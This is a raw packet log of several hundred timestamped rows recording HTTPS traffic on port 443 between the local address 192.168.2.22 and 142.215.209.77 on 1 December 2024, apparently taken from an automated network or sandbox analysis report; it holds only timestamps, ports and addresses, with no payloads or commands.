                                                            Dec 1, 2024 14:28:02.697662115 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.697737932 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.697745085 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.700750113 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.700820923 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.700829029 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.704034090 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.704090118 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.704099894 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.845921993 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.846009016 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.846025944 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.848551035 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.848575115 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.848593950 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.848615885 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.848628044 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.848644972 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.848666906 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.851145029 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.851166010 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.851181984 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.851202011 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.851222992 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.851229906 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.855453968 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.855464935 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.855494976 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.855510950 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.855520964 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.855562925 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.858436108 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.858445883 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.858494043 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.858503103 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.862401962 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.862412930 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.862454891 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.862471104 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.865569115 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.865607977 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.865624905 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.865634918 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.865679026 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.868720055 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.868731022 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.868779898 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.868788958 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.872819901 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.872878075 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.872885942 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.875776052 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.875830889 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.875838995 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.879616022 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.879667044 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.879676104 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.882831097 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.882891893 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.882900953 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.886842012 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.886893988 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.886902094 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.889962912 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.890017033 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.890026093 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.893208981 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.893263102 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.893270969 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.897352934 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.897407055 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.897416115 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.037022114 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.037122965 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.037142038 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.040247917 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.040260077 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.040283918 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.040327072 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.040349007 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.040363073 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.044277906 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.044290066 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.044311047 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.044336081 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.044351101 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.044400930 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.047861099 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.047872066 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.047890902 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.047914982 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.047930956 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.050724983 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.050734997 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.050779104 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.050791979 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.054655075 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.054666042 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.054708958 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.054723978 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.058023930 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.058034897 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.058078051 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.058088064 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.061038017 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.061074972 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.061094999 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.061104059 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.061148882 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.065159082 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.065170050 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.065210104 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.065217972 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.068792105 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.068846941 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.068855047 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.071904898 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.071958065 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.071965933 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.075022936 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.075073957 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.075082064 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.079184055 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.079241991 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.079252005 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.082304001 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.082370996 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.082380056 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.085402966 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.085457087 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.085465908 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.089438915 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.089492083 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.089499950 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.229418039 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.229532957 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.229563951 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.233650923 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.233663082 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.233706951 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.233717918 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.233743906 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.233805895 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.236426115 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.236438036 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.236464977 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.236476898 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.236521006 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.239738941 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.239748955 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.239768982 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.239799023 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.239799023 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.243772984 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.243782997 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.243824959 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.243840933 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.246881008 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.246891975 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.246937990 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.246946096 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.250087023 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.250097990 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.250142097 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.250150919 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.254134893 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.254168034 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.254182100 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.254190922 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.254235983 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.257431984 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.257442951 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.257486105 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.257494926 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.261053085 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.261106014 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.261115074 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.264055014 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.264111042 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.264118910 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.268140078 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.268197060 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.268204927 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.271342993 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.271390915 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.271399975 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.274441957 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.274493933 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.274502039 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.278531075 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.278592110 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.278599024 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.282202959 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.282255888 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.282263041 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.421360970 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.421430111 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.421443939 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.425303936 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.425313950 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.425340891 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.425358057 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.425368071 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.425424099 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.428529024 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.428540945 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.428563118 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.428575039 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.428608894 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.431682110 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.431693077 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.431710005 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.431741953 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.431755066 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.435676098 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.435687065 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.435740948 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.435750008 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.438941956 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.438952923 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.439018011 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.439027071 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.442034960 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.442045927 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.442087889 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.442096949 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.446118116 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.446151018 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.446171999 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.446182013 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.446234941 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.449364901 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.449376106 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.449420929 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.449429035 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.453367949 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.453448057 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.453454971 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.456080914 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.456146002 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.456155062 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.460103989 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.460156918 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.460165024 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.463342905 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.463396072 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.463406086 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.467377901 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.467431068 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.467439890 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.470506907 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.470558882 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.470566988 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.473705053 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.473757982 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.473766088 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.613949060 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.614027977 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.614048004 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.617954016 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.617964983 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.617986917 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.618012905 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.618021965 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.618061066 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.621088028 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.621099949 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.621118069 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.621149063 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.621182919 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.624427080 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.624437094 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.624459982 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.624483109 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.624495029 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.628351927 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.628360987 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.628428936 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.628437042 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.631474972 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.631486893 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.631534100 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.631541967 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.635962963 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.635972977 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.636013031 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.636020899 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.640192032 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.640219927 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.640244961 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.640252113 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.640311003 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.643050909 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.643062115 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.643116951 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.643125057 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.645272017 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.645325899 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.645334005 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.648730040 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.648789883 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.648797035 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.652800083 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.652853966 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.652862072 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.655858994 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.655913115 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.655920982 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.659209013 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.659262896 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.659271002 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.663167000 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.663218021 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.663227081 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.666352034 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.666404963 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.666413069 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.806633949 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.806730032 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.806768894 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.809807062 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.809817076 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.809844971 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.809869051 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.809880972 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.809945107 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.813055038 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.813066959 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.813086033 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.813113928 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.813127041 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.816943884 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.816955090 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.816976070 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.817008018 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.817022085 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.820146084 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.820162058 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:03.820225954 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:03.820235014 CET44349162142.215.209.77192.168.2.22
